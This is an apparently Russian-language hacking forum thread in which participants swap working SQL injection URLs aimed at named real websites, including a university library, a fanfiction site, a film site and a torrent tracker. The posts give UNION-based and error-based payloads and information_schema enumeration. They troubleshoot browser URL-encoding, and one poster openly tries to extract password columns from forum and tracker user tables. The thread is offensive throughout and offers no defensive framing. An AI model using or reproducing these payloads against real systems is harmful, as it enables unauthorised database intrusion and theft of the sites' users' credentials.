http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,14,15,16,17,18,19,20,21,22-- не?
ну ты и мозг))) а тут http://www.fanfics.ru/read.php?id=3&chapter=-616' ошибка есть, что не подставлю она пропадает, как быть?
Потому что скуля там не в GET-параметре, а в URI: http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1 Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11 А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение? и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+ как их вывести?
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+ Читая твои вопросы, в 70% у тебя проблема в себе самом и в том, что ты не пытаешься сам решить проблему. Если хочешь чему-то научиться, сначала пробуй разобраться.
http://site.com/about.php?page=' Is that sql vuln ? Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method... My tries: Code: http://site.com/about.php?page=')+order+by+13--+- http://site.com/about.php?page='+order+by+13--+- http://site.com/about.php?page=' order by 13 But there is no change... Any ideas ? BTW I'm sorry about the language, but if I use google translate, would be awful for all of us...
та то я нечаёно оставил, забыл вытереть прежде чем запостить да и так пробовал, вабще колонки выводить нехочет
Не понимаю почему у вас не получается, вот вам вывод, взял из случайной таблици: INNODB_CMP_RESET где ее хекс значение равняется 494e4e4f44425f434d505f5245534554 _http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=0x494e4e4f44425f434d505f5245534554+limit+0,1--+
такс, тут ещо проблема http://torrnado.ru/peerlist.php?id=982+and%28select+1+from%28select+count%28*%29,concat%28%28select+column_name+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+19000,1%29,0x00,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--+ таблици вывело нормально отсюда torrent:xbt_users:1567810 нехочет выводить кольнку pass(не могу поверить что она пустая) и нхочет вобще выводить колонки и инфу из torrenthpbb_users:1551912 ну пустой она быть нможет так как там всётак есть форум с юзерами)) как мн ето всё вывести?
